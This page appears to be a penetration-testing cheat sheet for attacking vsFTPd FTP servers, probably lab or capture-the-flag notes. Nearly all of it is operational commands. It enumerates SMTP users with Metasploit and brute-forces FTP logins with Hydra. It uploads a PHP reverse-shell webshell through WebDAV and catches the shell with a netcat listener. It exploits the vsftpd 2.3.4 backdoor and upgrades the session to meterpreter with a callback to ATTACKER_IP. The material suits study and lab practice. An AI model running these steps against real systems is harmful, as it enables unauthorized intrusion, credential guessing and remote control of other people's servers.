Skip to content

vsFTPd

  1. Check anonymous login.

  2. If the target has SMTP enabled, enumerate users on the system:

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARET_IP
set UNIXONLY true
run
  1. Perform a brute-force attack using the list of users obtained with SMTP:
hydra -L USERS_LIST -P PASSWORDS_LIST TARGET_IP ftp
  1. If WebDAV is enabled, upload a webshell to its directory and 
cp /usr/share/webshells/php/php-reverse-shell.php .
# Modify IP and port values

# Upload the shell to the dav directory
put shell.php /var/www/dav/shell.php

nc -nvlp ATTACKER_PORT

vsFTPd v2.3.4

VSFTPD (Very Secure FTP Daemon) is a FTP server software for Unix-like systems designed to be fast and lightweight while providing essential features for file transfer operations.

vsftpd v2.3.4 is vulnerable to command execution vulnerability that is facilitated by a malicious backdoor that was added to the vsftpd download archive through a supply chain attack.

Exploitation using Metasploit

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS TARGET_IP

run

# Once exploited, upgrade to a meterpreter command line
use post/multi/manage/shell_to_meterpreter
set LHOST ATTACKER_IP
set SESSION session_id